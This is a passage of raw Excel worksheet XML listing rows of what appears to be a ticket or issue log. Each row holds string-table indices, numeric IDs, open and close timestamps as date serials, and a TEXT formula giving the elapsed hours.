      <c r="H1722" t="str">
        <f>TEXT(F1722-E1722,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1723" spans="1:8" hidden="1">
      <c r="A1723" t="s">
        <v>4482</v>
      </c>
      <c r="B1723">
        <v>11316</v>
      </c>
      <c r="C1723" t="s">
        <v>4483</v>
      </c>
      <c r="D1723" t="s">
        <v>7</v>
      </c>
      <c r="E1723" s="1">
        <v>43263.714756944442</v>
      </c>
      <c r="F1723" s="1">
        <v>43279.090636574074</v>
      </c>
      <c r="G1723" t="s">
        <v>2152</v>
      </c>
      <c r="H1723" t="str">
        <f>TEXT(F1723-E1723,"[h]")</f>
        <v>369</v>
      </c>
    </row>
    <row r="1724" spans="1:8" hidden="1">
      <c r="A1724" t="s">
        <v>4484</v>
      </c>
      <c r="B1724">
        <v>11315</v>
      </c>
      <c r="C1724" t="s">
        <v>4485</v>
      </c>
      <c r="D1724" t="s">
        <v>7</v>
      </c>
      <c r="E1724" s="1">
        <v>43263.714745370373</v>
      </c>
      <c r="F1724" s="1">
        <v>43263.797511574077</v>
      </c>
      <c r="G1724" t="s">
        <v>60</v>
      </c>
      <c r="H1724" t="str">
        <f>TEXT(F1724-E1724,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1725" spans="1:8" hidden="1">
      <c r="A1725" t="s">
        <v>4486</v>
      </c>
      <c r="B1725">
        <v>11314</v>
      </c>
      <c r="C1725" t="s">
        <v>4487</v>
      </c>
      <c r="D1725" t="s">
        <v>7</v>
      </c>
      <c r="E1725" s="1">
        <v>43263.670810185184</v>
      </c>
      <c r="F1725" s="1">
        <v>43263.791898148149</v>
      </c>
      <c r="G1725" t="s">
        <v>28</v>
      </c>
      <c r="H1725" t="str">
        <f>TEXT(F1725-E1725,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1726" spans="1:8" hidden="1">
      <c r="A1726" t="s">
        <v>4488</v>
      </c>
      <c r="B1726">
        <v>11312</v>
      </c>
      <c r="C1726" t="s">
        <v>4489</v>
      </c>
      <c r="D1726" t="s">
        <v>7</v>
      </c>
      <c r="E1726" s="1">
        <v>43262.937650462962</v>
      </c>
      <c r="F1726" s="1">
        <v>43267.944837962961</v>
      </c>
      <c r="G1726" t="s">
        <v>4490</v>
      </c>
      <c r="H1726" t="str">
        <f>TEXT(F1726-E1726,"[h]")</f>
        <v>120</v>
      </c>
    </row>
    <row r="1727" spans="1:8" hidden="1">
      <c r="A1727" t="s">
        <v>4491</v>
      </c>
      <c r="B1727">
        <v>11311</v>
      </c>
      <c r="C1727" t="s">
        <v>4492</v>
      </c>
      <c r="D1727" t="s">
        <v>7</v>
      </c>
      <c r="E1727" s="1">
        <v>43262.901145833333</v>
      </c>
      <c r="F1727" s="1">
        <v>43263.732060185182</v>
      </c>
      <c r="G1727" t="s">
        <v>66</v>
      </c>
      <c r="H1727" t="str">
        <f>TEXT(F1727-E1727,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="1728" spans="1:8">
      <c r="A1728" t="s">
        <v>4493</v>
      </c>
      <c r="B1728">
        <v>11307</v>
      </c>
      <c r="C1728" t="s">
        <v>4494</v>
      </c>
      <c r="D1728" t="s">
        <v>7</v>
      </c>
      <c r="E1728" s="1">
        <v>43262.565254629626</v>
      </c>
      <c r="F1728" s="1">
        <v>43262.781828703701</v>
      </c>
      <c r="G1728" t="s">
        <v>19</v>
      </c>
      <c r="H1728" t="str">
        <f>TEXT(F1728-E1728,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1729" spans="1:8">
      <c r="A1729" t="s">
        <v>4495</v>
      </c>
      <c r="B1729">
        <v>11306</v>
      </c>
      <c r="C1729" t="s">
        <v>4496</v>
      </c>
      <c r="D1729" t="s">
        <v>7</v>
      </c>
      <c r="E1729" s="1">
        <v>43262.553425925929</v>
      </c>
      <c r="F1729" s="1">
        <v>43279.83353009259</v>
      </c>
      <c r="G1729" t="s">
        <v>4497</v>
      </c>
      <c r="H1729" t="str">
        <f>TEXT(F1729-E1729,"[h]")</f>
        <v>414</v>
      </c>
    </row>
    <row r="1730" spans="1:8">
      <c r="A1730" t="s">
        <v>4498</v>
      </c>
      <c r="B1730">
        <v>11305</v>
      </c>
      <c r="C1730" t="s">
        <v>4499</v>
      </c>
      <c r="D1730" t="s">
        <v>7</v>
      </c>
      <c r="E1730" s="1">
        <v>43262.406701388885</v>
      </c>
      <c r="F1730" s="1">
        <v>43262.78261574074</v>
      </c>
      <c r="G1730" t="s">
        <v>123</v>
      </c>
      <c r="H1730" t="str">
        <f>TEXT(F1730-E1730,"[h]")</f>
        <v>9</v>
      </c>
    </row>
    <row r="1731" spans="1:8" hidden="1">
      <c r="A1731" t="s">
        <v>4500</v>
      </c>
      <c r="B1731">
        <v>11301</v>
      </c>
      <c r="C1731" t="s">
        <v>4501</v>
      </c>
      <c r="D1731" t="s">
        <v>7</v>
      </c>
      <c r="E1731" s="1">
        <v>43261.988159722219</v>
      </c>
      <c r="F1731" s="1">
        <v>43275.884421296294</v>
      </c>
      <c r="G1731" t="s">
        <v>4502</v>
      </c>
      <c r="H1731" t="str">
        <f>TEXT(F1731-E1731,"[h]")</f>
        <v>333</v>
      </c>
    </row>
    <row r="1732" spans="1:8">
      <c r="A1732" t="s">
        <v>4503</v>
      </c>
      <c r="B1732">
        <v>11299</v>
      </c>
      <c r="C1732" t="s">
        <v>4504</v>
      </c>
      <c r="D1732" t="s">
        <v>7</v>
      </c>
      <c r="E1732" s="1">
        <v>43261.762812499997</v>
      </c>
      <c r="F1732" s="1">
        <v>43314.909143518518</v>
      </c>
      <c r="G1732" t="s">
        <v>610</v>
      </c>
      <c r="H1732" t="str">
        <f>TEXT(F1732-E1732,"[h]")</f>
        <v>1275</v>
      </c>
    </row>
    <row r="1733" spans="1:8">
      <c r="A1733" t="s">
        <v>4505</v>
      </c>
      <c r="B1733">
        <v>11298</v>
      </c>
      <c r="C1733" t="s">
        <v>3653</v>
      </c>
      <c r="D1733" t="s">
        <v>7</v>
      </c>
      <c r="E1733" s="1">
        <v>43261.75744212963</v>
      </c>
      <c r="F1733" s="1">
        <v>43261.835752314815</v>
      </c>
      <c r="G1733" t="s">
        <v>1420</v>
      </c>
      <c r="H1733" t="str">
        <f>TEXT(F1733-E1733,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1734" spans="1:8" hidden="1">
      <c r="A1734" t="s">
        <v>4506</v>
      </c>
      <c r="B1734">
        <v>11297</v>
      </c>
      <c r="C1734" t="s">
        <v>4507</v>
      </c>
      <c r="D1734" t="s">
        <v>7</v>
      </c>
      <c r="E1734" s="1">
        <v>43261.684560185182</v>
      </c>
      <c r="F1734" s="1">
        <v>43265.918171296296</v>
      </c>
      <c r="G1734" t="s">
        <v>831</v>
      </c>
      <c r="H1734" t="str">
        <f>TEXT(F1734-E1734,"[h]")</f>
        <v>101</v>
      </c>
    </row>
    <row r="1735" spans="1:8">
      <c r="A1735" t="s">
        <v>4508</v>
      </c>
      <c r="B1735">
        <v>11296</v>
      </c>
      <c r="C1735" t="s">
        <v>4509</v>
      </c>
      <c r="D1735" t="s">
        <v>7</v>
      </c>
      <c r="E1735" s="1">
        <v>43261.294490740744</v>
      </c>
      <c r="F1735" s="1">
        <v>43261.725995370369</v>
      </c>
      <c r="G1735" t="s">
        <v>16</v>
      </c>
      <c r="H1735" t="str">
        <f>TEXT(F1735-E1735,"[h]")</f>
        <v>10</v>
      </c>
    </row>
    <row r="1736" spans="1:8" hidden="1">
      <c r="A1736" t="s">
        <v>4510</v>
      </c>
      <c r="B1736">
        <v>11295</v>
      </c>
      <c r="C1736" t="s">
        <v>4511</v>
      </c>
      <c r="D1736" t="s">
        <v>7</v>
      </c>
      <c r="E1736" s="1">
        <v>43261.176238425927</v>
      </c>
      <c r="F1736" s="1">
        <v>43261.326249999998</v>
      </c>
      <c r="G1736" t="s">
        <v>63</v>
      </c>
      <c r="H1736" t="str">
        <f>TEXT(F1736-E1736,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1737" spans="1:8" hidden="1">
      <c r="A1737" t="s">
        <v>4514</v>
      </c>
      <c r="B1737">
        <v>11293</v>
      </c>
      <c r="C1737" t="s">
        <v>4515</v>
      </c>
      <c r="D1737" t="s">
        <v>7</v>
      </c>
      <c r="E1737" s="1">
        <v>43260.853912037041</v>
      </c>
      <c r="F1737" s="1">
        <v>43261.644745370373</v>
      </c>
      <c r="G1737" t="s">
        <v>255</v>
      </c>
      <c r="H1737" t="str">
        <f>TEXT(F1737-E1737,"[h]")</f>
        <v>18</v>
      </c>
    </row>
    <row r="1738" spans="1:8">
      <c r="A1738" t="s">
        <v>4512</v>
      </c>
      <c r="B1738">
        <v>11291</v>
      </c>
      <c r="C1738" t="s">
        <v>4513</v>
      </c>
      <c r="D1738" t="s">
        <v>7</v>
      </c>
      <c r="E1738" s="1">
        <v>43260.651423611111</v>
      </c>
      <c r="F1738" s="1">
        <v>43260.965648148151</v>
      </c>
      <c r="G1738" t="s">
        <v>16</v>
      </c>
      <c r="H1738" t="str">
        <f>TEXT(F1738-E1738,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1739" spans="1:8" hidden="1">
      <c r="A1739" t="s">
        <v>4516</v>
      </c>
      <c r="B1739">
        <v>11290</v>
      </c>
      <c r="C1739" t="s">
        <v>4517</v>
      </c>
      <c r="D1739" t="s">
        <v>7</v>
      </c>
      <c r="E1739" s="1">
        <v>43260.488298611112</v>
      </c>
      <c r="F1739" s="1">
        <v>43344.392175925925</v>
      </c>
      <c r="G1739" t="s">
        <v>115</v>
      </c>
      <c r="H1739" t="str">
        <f>TEXT(F1739-E1739,"[h]")</f>
        <v>2013</v>
      </c>
    </row>
    <row r="1740" spans="1:8" hidden="1">
      <c r="A1740" t="s">
        <v>4518</v>
      </c>
      <c r="B1740">
        <v>11289</v>
      </c>
      <c r="C1740" t="s">
        <v>4519</v>
      </c>
      <c r="D1740" t="s">
        <v>7</v>
      </c>
      <c r="E1740" s="1">
        <v>43260.362719907411</v>
      </c>
      <c r="F1740" s="1">
        <v>43261.619363425925</v>
      </c>
      <c r="G1740" t="s">
        <v>115</v>
      </c>
      <c r="H1740" t="str">
        <f>TEXT(F1740-E1740,"[h]")</f>
        <v>30</v>
      </c>
    </row>
    <row r="1741" spans="1:8" hidden="1">
      <c r="A1741" t="s">
        <v>4520</v>
      </c>
      <c r="B1741">
        <v>11287</v>
      </c>
      <c r="C1741" t="s">
        <v>4521</v>
      </c>
      <c r="D1741" t="s">
        <v>7</v>
      </c>
      <c r="E1741" s="1">
        <v>43260.004965277774</v>
      </c>
      <c r="F1741" s="1">
        <v>43260.045798611114</v>
      </c>
      <c r="G1741" t="s">
        <v>51</v>
      </c>
      <c r="H1741" t="str">
        <f>TEXT(F1741-E1741,"[h]")</f>
        <v>0</v>
      </c>
    </row>
    <row r="1742" spans="1:8">
      <c r="A1742" t="s">
        <v>4522</v>
      </c>
      <c r="B1742">
        <v>11286</v>
      </c>
      <c r="C1742" t="s">
        <v>4523</v>
      </c>
      <c r="D1742" t="s">
        <v>7</v>
      </c>
      <c r="E1742" s="1">
        <v>43259.96539351852</v>
      </c>
      <c r="F1742" s="1">
        <v>43263.897060185183</v>
      </c>
      <c r="G1742" t="s">
        <v>214</v>
      </c>
      <c r="H1742" t="str">
        <f>TEXT(F1742-E1742,"[h]")</f>
        <v>94</v>
      </c>
    </row>
    <row r="1743" spans="1:8" hidden="1">
      <c r="A1743" t="s">
        <v>4524</v>
      </c>
      <c r="B1743">
        <v>11282</v>
      </c>
      <c r="C1743" t="s">
        <v>4525</v>
      </c>
      <c r="D1743" t="s">
        <v>7</v>
      </c>
      <c r="E1743" s="1">
        <v>43259.645798611113</v>
      </c>
      <c r="F1743" s="1">
        <v>43272.538449074076</v>
      </c>
      <c r="G1743" t="s">
        <v>4526</v>
      </c>
      <c r="H1743" t="str">
        <f>TEXT(F1743-E1743,"[h]")</f>
        <v>309</v>
      </c>
    </row>
    <row r="1744" spans="1:8" hidden="1">
      <c r="A1744" t="s">
        <v>4527</v>
      </c>
      <c r="B1744">
        <v>11280</v>
      </c>
      <c r="C1744" t="s">
        <v>4528</v>
      </c>
      <c r="D1744" t="s">
        <v>7</v>
      </c>
      <c r="E1744" s="1">
        <v>43259.342557870368</v>
      </c>
      <c r="F1744" s="1">
        <v>43259.681967592594</v>
      </c>
      <c r="G1744" t="s">
        <v>75</v>
      </c>
      <c r="H1744" t="str">
        <f>TEXT(F1744-E1744,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1745" spans="1:8">
      <c r="A1745" t="s">
        <v>4529</v>
      </c>
      <c r="B1745">
        <v>11277</v>
      </c>
      <c r="C1745" t="s">
        <v>4530</v>
      </c>
      <c r="D1745" t="s">
        <v>7</v>
      </c>
      <c r="E1745" s="1">
        <v>43259.19667824074</v>
      </c>
      <c r="F1745" s="1">
        <v>43259.813819444447</v>
      </c>
      <c r="G1745" t="s">
        <v>1456</v>
      </c>
      <c r="H1745" t="str">
        <f>TEXT(F1745-E1745,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1746" spans="1:8" hidden="1">
      <c r="A1746" t="s">
        <v>4531</v>
      </c>
      <c r="B1746">
        <v>11275</v>
      </c>
      <c r="C1746" t="s">
        <v>4532</v>
      </c>
      <c r="D1746" t="s">
        <v>7</v>
      </c>
      <c r="E1746" s="1">
        <v>43258.96738425926</v>
      </c>
      <c r="F1746" s="1">
        <v>43259.038298611114</v>
      </c>
      <c r="G1746" t="s">
        <v>55</v>
      </c>
      <c r="H1746" t="str">
        <f>TEXT(F1746-E1746,"[h]")</f>
        <v>1</v>
      </c>
    </row>
    <row r="1747" spans="1:8">
      <c r="A1747" t="s">
        <v>4535</v>
      </c>
      <c r="B1747">
        <v>11273</v>
      </c>
      <c r="C1747" t="s">
        <v>4536</v>
      </c>
      <c r="D1747" t="s">
        <v>7</v>
      </c>
      <c r="E1747" s="1">
        <v>43258.844363425924</v>
      </c>
      <c r="F1747" s="1">
        <v>43259.908807870372</v>
      </c>
      <c r="G1747" t="s">
        <v>16</v>
      </c>
      <c r="H1747" t="str">
        <f>TEXT(F1747-E1747,"[h]")</f>
        <v>25</v>
      </c>
    </row>
    <row r="1748" spans="1:8" hidden="1">
      <c r="A1748" t="s">
        <v>4537</v>
      </c>
      <c r="B1748">
        <v>11272</v>
      </c>
      <c r="C1748" t="s">
        <v>4538</v>
      </c>
      <c r="D1748" t="s">
        <v>7</v>
      </c>
      <c r="E1748" s="1">
        <v>43258.814444444448</v>
      </c>
      <c r="F1748" s="1">
        <v>43259.043958333335</v>
      </c>
      <c r="G1748" t="s">
        <v>118</v>
      </c>
      <c r="H1748" t="str">
        <f>TEXT(F1748-E1748,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1749" spans="1:8">
      <c r="A1749" t="s">
        <v>4533</v>
      </c>
      <c r="B1749">
        <v>11269</v>
      </c>
      <c r="C1749" t="s">
        <v>4534</v>
      </c>
      <c r="D1749" t="s">
        <v>7</v>
      </c>
      <c r="E1749" s="1">
        <v>43258.597581018519</v>
      </c>
      <c r="F1749" s="1">
        <v>43258.768738425926</v>
      </c>
      <c r="G1749" t="s">
        <v>16</v>
      </c>
      <c r="H1749" t="str">
        <f>TEXT(F1749-E1749,"[h]")</f>
        <v>4</v>
      </c>
    </row>
    <row r="1750" spans="1:8">
      <c r="A1750" t="s">
        <v>4539</v>
      </c>
      <c r="B1750">
        <v>11267</v>
      </c>
      <c r="C1750" t="s">
        <v>4540</v>
      </c>
      <c r="D1750" t="s">
        <v>7</v>
      </c>
      <c r="E1750" s="1">
        <v>43258.44494212963</v>
      </c>
      <c r="F1750" s="1">
        <v>43258.768738425926</v>
      </c>
      <c r="G1750" t="s">
        <v>25</v>
      </c>
      <c r="H1750" t="str">
        <f>TEXT(F1750-E1750,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1751" spans="1:8">
      <c r="A1751" t="s">
        <v>4541</v>
      </c>
      <c r="B1751">
        <v>11264</v>
      </c>
      <c r="C1751" t="s">
        <v>4542</v>
      </c>
      <c r="D1751" t="s">
        <v>7</v>
      </c>
      <c r="E1751" s="1">
        <v>43257.996435185189</v>
      </c>
      <c r="F1751" s="1">
        <v>43339.736655092594</v>
      </c>
      <c r="G1751" t="s">
        <v>189</v>
      </c>
      <c r="H1751" t="str">
        <f>TEXT(F1751-E1751,"[h]")</f>
        <v>1961</v>
      </c>
    </row>
    <row r="1752" spans="1:8" hidden="1">
      <c r="A1752" t="s">
        <v>4543</v>
      </c>
      <c r="B1752">
        <v>11263</v>
      </c>
      <c r="C1752" t="s">
        <v>4544</v>
      </c>
      <c r="D1752" t="s">
        <v>7</v>
      </c>
      <c r="E1752" s="1">
        <v>43257.882743055554</v>
      </c>
      <c r="F1752" s="1">
        <v>43258.69866898148</v>
      </c>
      <c r="G1752" t="s">
        <v>1596</v>
      </c>
      <c r="H1752" t="str">
        <f>TEXT(F1752-E1752,"[h]")</f>
        <v>19</v>
      </c>
    </row>
    <row r="1753" spans="1:8" hidden="1">
      <c r="A1753" t="s">
        <v>4545</v>
      </c>
      <c r="B1753">
        <v>11260</v>
      </c>
      <c r="C1753" t="s">
        <v>4546</v>
      </c>
      <c r="D1753" t="s">
        <v>7</v>
      </c>
      <c r="E1753" s="1">
        <v>43257.748101851852</v>
      </c>
      <c r="F1753" s="1">
        <v>43261.639884259261</v>
      </c>
      <c r="G1753" t="s">
        <v>4526</v>
      </c>
      <c r="H1753" t="str">
        <f>TEXT(F1753-E1753,"[h]")</f>
        <v>93</v>
      </c>
    </row>
    <row r="1754" spans="1:8">
      <c r="A1754" t="s">
        <v>4547</v>
      </c>
      <c r="B1754">
        <v>11259</v>
      </c>
      <c r="C1754" t="s">
        <v>4548</v>
      </c>
      <c r="D1754" t="s">
        <v>7</v>
      </c>
      <c r="E1754" s="1">
        <v>43257.610289351855</v>
      </c>
      <c r="F1754" s="1">
        <v>43730.927118055559</v>
      </c>
      <c r="G1754" t="s">
        <v>4549</v>
      </c>
      <c r="H1754" t="str">
        <f>TEXT(F1754-E1754,"[h]")</f>
        <v>11359</v>
      </c>
    </row>
    <row r="1755" spans="1:8">
      <c r="A1755" t="s">
        <v>4550</v>
      </c>
      <c r="B1755">
        <v>11257</v>
      </c>
      <c r="C1755" t="s">
        <v>4551</v>
      </c>
      <c r="D1755" t="s">
        <v>7</v>
      </c>
      <c r="E1755" s="1">
        <v>43257.572442129633</v>
      </c>
      <c r="F1755" s="1">
        <v>43257.692291666666</v>
      </c>
      <c r="G1755" t="s">
        <v>16</v>
      </c>
      <c r="H1755" t="str">
        <f>TEXT(F1755-E1755,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1756" spans="1:8" hidden="1">
      <c r="A1756" t="s">
        <v>4552</v>
      </c>
      <c r="B1756">
        <v>11252</v>
      </c>
      <c r="C1756" t="s">
        <v>4553</v>
      </c>
      <c r="D1756" t="s">
        <v>7</v>
      </c>
      <c r="E1756" s="1">
        <v>43256.686689814815</v>
      </c>
      <c r="F1756" s="1">
        <v>43256.902418981481</v>
      </c>
      <c r="G1756" t="s">
        <v>51</v>
      </c>
      <c r="H1756" t="str">
        <f>TEXT(F1756-E1756,"[h]")</f>
        <v>5</v>
      </c>
    </row>
    <row r="1757" spans="1:8" hidden="1">
      <c r="A1757" t="s">
        <v>446</v>
      </c>
      <c r="B1757">
        <v>11251</v>
      </c>
      <c r="C1757" t="s">
        <v>4554</v>
      </c>
      <c r="D1757" t="s">
        <v>7</v>
      </c>
      <c r="E1757" s="1">
        <v>43256.620763888888</v>
      </c>
      <c r="F1757" s="1">
        <v>43256.970775462964</v>
      </c>
      <c r="G1757" t="s">
        <v>51</v>
      </c>
      <c r="H1757" t="str">
        <f>TEXT(F1757-E1757,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1758" spans="1:8">
      <c r="A1758" t="s">
        <v>4555</v>
      </c>
      <c r="B1758">
        <v>11250</v>
      </c>
      <c r="C1758" t="s">
        <v>4556</v>
      </c>
      <c r="D1758" t="s">
        <v>7</v>
      </c>
      <c r="E1758" s="1">
        <v>43256.558310185188</v>
      </c>
      <c r="F1758" s="1">
        <v>43475.722453703704</v>
      </c>
      <c r="G1758" t="s">
        <v>189</v>
      </c>
      <c r="H1758" t="str">
        <f>TEXT(F1758-E1758,"[h]")</f>
        <v>5259</v>
      </c>
    </row>
    <row r="1759" spans="1:8">
      <c r="A1759" t="s">
        <v>4557</v>
      </c>
      <c r="B1759">
        <v>11249</v>
      </c>
      <c r="C1759" t="s">
        <v>4558</v>
      </c>
      <c r="D1759" t="s">
        <v>7</v>
      </c>
      <c r="E1759" s="1">
        <v>43256.291122685187</v>
      </c>
      <c r="F1759" s="1">
        <v>43256.901041666664</v>
      </c>
      <c r="G1759" t="s">
        <v>16</v>
      </c>
      <c r="H1759" t="str">
        <f>TEXT(F1759-E1759,"[h]")</f>
        <v>14</v>
      </c>
    </row>
    <row r="1760" spans="1:8">
      <c r="A1760" t="s">
        <v>4561</v>
      </c>
      <c r="B1760">
        <v>11247</v>
      </c>
      <c r="C1760" t="s">
        <v>4562</v>
      </c>
      <c r="D1760" t="s">
        <v>7</v>
      </c>
      <c r="E1760" s="1">
        <v>43256.283680555556</v>
      </c>
      <c r="F1760" s="1">
        <v>43256.76489583333</v>
      </c>
      <c r="G1760" t="s">
        <v>13</v>
      </c>
      <c r="H1760" t="str">
        <f>TEXT(F1760-E1760,"[h]")</f>
        <v>11</v>
      </c>
    </row>
    <row r="1761" spans="1:8">
      <c r="A1761" t="s">
        <v>4563</v>
      </c>
      <c r="B1761">
        <v>11246</v>
      </c>
      <c r="C1761" t="s">
        <v>4564</v>
      </c>
      <c r="D1761" t="s">
        <v>7</v>
      </c>
      <c r="E1761" s="1">
        <v>43256.280358796299</v>
      </c>
      <c r="F1761" s="1">
        <v>43259.182592592595</v>
      </c>
      <c r="G1761" t="s">
        <v>3487</v>
      </c>
      <c r="H1761" t="str">
        <f>TEXT(F1761-E1761,"[h]")</f>
        <v>69</v>
      </c>
    </row>
    <row r="1762" spans="1:8">
      <c r="A1762" t="s">
        <v>4565</v>
      </c>
      <c r="B1762">
        <v>11245</v>
      </c>
      <c r="C1762" t="s">
        <v>4566</v>
      </c>
      <c r="D1762" t="s">
        <v>7</v>
      </c>
      <c r="E1762" s="1">
        <v>43256.237511574072</v>
      </c>
      <c r="F1762" s="1">
        <v>43256.901041666664</v>
      </c>
      <c r="G1762" t="s">
        <v>25</v>
      </c>
      <c r="H1762" t="str">
        <f>TEXT(F1762-E1762,"[h]")</f>
        <v>15</v>
      </c>
    </row>
    <row r="1763" spans="1:8">
      <c r="A1763" t="s">
        <v>4567</v>
      </c>
      <c r="B1763">
        <v>11244</v>
      </c>
      <c r="C1763" t="s">
        <v>4568</v>
      </c>
      <c r="D1763" t="s">
        <v>7</v>
      </c>
      <c r="E1763" s="1">
        <v>43255.729108796295</v>
      </c>
      <c r="F1763" s="1">
        <v>43257.57304398148</v>
      </c>
      <c r="G1763" t="s">
        <v>16</v>
      </c>
      <c r="H1763" t="str">
        <f>TEXT(F1763-E1763,"[h]")</f>
        <v>44</v>
      </c>
    </row>
    <row r="1764" spans="1:8" hidden="1">
      <c r="A1764" t="s">
        <v>4569</v>
      </c>
      <c r="B1764">
        <v>11240</v>
      </c>
      <c r="C1764" t="s">
        <v>4570</v>
      </c>
      <c r="D1764" t="s">
        <v>7</v>
      </c>
      <c r="E1764" s="1">
        <v>43255.343935185185</v>
      </c>
      <c r="F1764" s="1">
        <v>43255.689467592594</v>
      </c>
      <c r="G1764" t="s">
        <v>174</v>
      </c>
      <c r="H1764" t="str">
        <f>TEXT(F1764-E1764,"[h]")</f>
        <v>8</v>
      </c>
    </row>
    <row r="1765" spans="1:8" hidden="1">
      <c r="A1765" t="s">
        <v>4571</v>
      </c>
      <c r="B1765">
        <v>11239</v>
      </c>
      <c r="C1765" t="s">
        <v>4572</v>
      </c>
      <c r="D1765" t="s">
        <v>7</v>
      </c>
      <c r="E1765" s="1">
        <v>43255.059803240743</v>
      </c>
      <c r="F1765" s="1">
        <v>43255.805810185186</v>
      </c>
      <c r="G1765" t="s">
        <v>174</v>
      </c>
      <c r="H1765" t="str">
        <f>TEXT(F1765-E1765,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="1766" spans="1:8" hidden="1">
      <c r="A1766" t="s">
        <v>4559</v>
      </c>
      <c r="B1766">
        <v>11238</v>
      </c>
      <c r="C1766" t="s">
        <v>4560</v>
      </c>
      <c r="D1766" t="s">
        <v>7</v>
      </c>
      <c r="E1766" s="1">
        <v>43255.031273148146</v>
      </c>
      <c r="F1766" s="1">
        <v>43255.761365740742</v>
      </c>
      <c r="G1766" t="s">
        <v>28</v>
      </c>
      <c r="H1766" t="str">
        <f>TEXT(F1766-E1766,"[h]")</f>
        <v>17</v>
      </c>
    </row>
    <row r="1767" spans="1:8">
      <c r="A1767" t="s">
        <v>4573</v>
      </c>
      <c r="B1767">
        <v>11237</v>
      </c>
      <c r="C1767" t="s">
        <v>4574</v>
      </c>
      <c r="D1767" t="s">
        <v>7</v>
      </c>
      <c r="E1767" s="1">
        <v>43255.021249999998</v>
      </c>
      <c r="F1767" s="1">
        <v>43259.182592592595</v>
      </c>
      <c r="G1767" t="s">
        <v>16</v>
      </c>
      <c r="H1767" t="str">
        <f>TEXT(F1767-E1767,"[h]")</f>
        <v>99</v>
      </c>
    </row>
    <row r="1768" spans="1:8" hidden="1">
      <c r="A1768" t="s">
        <v>4575</v>
      </c>
      <c r="B1768">
        <v>11234</v>
      </c>
      <c r="C1768" t="s">
        <v>4576</v>
      </c>
      <c r="D1768" t="s">
        <v>7</v>
      </c>
      <c r="E1768" s="1">
        <v>43254.867905092593</v>
      </c>
      <c r="F1768" s="1">
        <v>43278.780393518522</v>
      </c>
      <c r="G1768" t="s">
        <v>255</v>
      </c>
      <c r="H1768" t="str">
        <f>TEXT(F1768-E1768,"[h]")</f>
        <v>573</v>
      </c>
    </row>
    <row r="1769" spans="1:8">
      <c r="A1769" t="s">
        <v>4577</v>
      </c>
      <c r="B1769">
        <v>11233</v>
      </c>
      <c r="C1769" t="s">
        <v>4578</v>
      </c>
      <c r="D1769" t="s">
        <v>7</v>
      </c>
      <c r="E1769" s="1">
        <v>43254.779988425929</v>
      </c>
      <c r="F1769" s="1">
        <v>43628.616736111115</v>
      </c>
      <c r="G1769" t="s">
        <v>31</v>
      </c>
      <c r="H1769" t="str">
        <f>TEXT(F1769-E1769,"[h]")</f>
        <v>8972</v>
      </c>
    </row>
    <row r="1770" spans="1:8" hidden="1">
      <c r="A1770" t="s">
        <v>4579</v>
      </c>
      <c r="B1770">
        <v>11231</v>
      </c>
      <c r="C1770" t="s">
        <v>4580</v>
      </c>
      <c r="D1770" t="s">
        <v>7</v>
      </c>
      <c r="E1770" s="1">
        <v>43253.909363425926</v>
      </c>
      <c r="F1770" s="1">
        <v>43254.21702546296</v>
      </c>
      <c r="G1770" t="s">
        <v>28</v>
      </c>
      <c r="H1770" t="str">
        <f>TEXT(F1770-E1770,"[h]")</f>
        <v>7</v>
      </c>
    </row>
    <row r="1771" spans="1:8" hidden="1">
      <c r="A1771" t="s">
        <v>4581</v>
      </c>
      <c r="B1771">
        <v>11230</v>
      </c>
      <c r="C1771" t="s">
        <v>4582</v>
      </c>
      <c r="D1771" t="s">
        <v>7</v>
      </c>
      <c r="E1771" s="1">
        <v>43253.884629629632</v>
      </c>
      <c r="F1771" s="1">
        <v>43480.280856481484</v>
      </c>
      <c r="G1771" t="s">
        <v>28</v>
      </c>
      <c r="H1771" t="str">
        <f>TEXT(F1771-E1771,"[h]")</f>
        <v>5433</v>
      </c>
    </row>
    <row r="1772" spans="1:8" hidden="1">
      <c r="A1772" t="s">
        <v>4583</v>
      </c>
      <c r="B1772">
        <v>11229</v>
      </c>
      <c r="C1772" t="s">
        <v>4584</v>
      </c>
      <c r="D1772" t="s">
        <v>7</v>
      </c>
      <c r="E1772" s="1">
        <v>43253.787951388891</v>
      </c>
      <c r="F1772" s="1">
        <v>43255.823877314811</v>
      </c>
      <c r="G1772" t="s">
        <v>831</v>
      </c>
      <c r="H1772" t="str">
        <f>TEXT(F1772-E1772,"[h]")</f>
        <v>48</v>
      </c>
    </row>
    <row r="1773" spans="1:8" hidden="1">
      <c r="A1773" t="s">
        <v>4585</v>
      </c>
      <c r="B1773">
        <v>11226</v>
      </c>
      <c r="C1773" t="s">
        <v>4586</v>
      </c>
      <c r="D1773" t="s">
        <v>7</v>
      </c>
      <c r="E1773" s="1">
        <v>43252.89570601852</v>
      </c>
      <c r="F1773" s="1">
        <v>43252.985532407409</v>
      </c>
      <c r="G1773" t="s">
        <v>998</v>
      </c>
      <c r="H1773" t="str">
        <f>TEXT(F1773-E1773,"[h]")</f>
        <v>2</v>
      </c>
    </row>
    <row r="1774" spans="1:8" hidden="1">
      <c r="A1774" t="s">
        <v>4587</v>
      </c>
      <c r="B1774">
        <v>11225</v>
      </c>
      <c r="C1774" t="s">
        <v>4588</v>
      </c>
      <c r="D1774" t="s">
        <v>7</v>
      </c>
      <c r="E1774" s="1">
        <v>43252.864085648151</v>
      </c>
      <c r="F1774" s="1">
        <v>43253.023402777777</v>
      </c>
      <c r="G1774" t="s">
        <v>75</v>
      </c>
      <c r="H1774" t="str">
        <f>TEXT(F1774-E1774,"[h]")</f>
        <v>3</v>
      </c>
    </row>
    <row r="1775" spans="1:8">
      <c r="A1775" t="s">
        <v>4589</v>
      </c>
      <c r="B1775">
        <v>11223</v>
      </c>
      <c r="C1775" t="s">
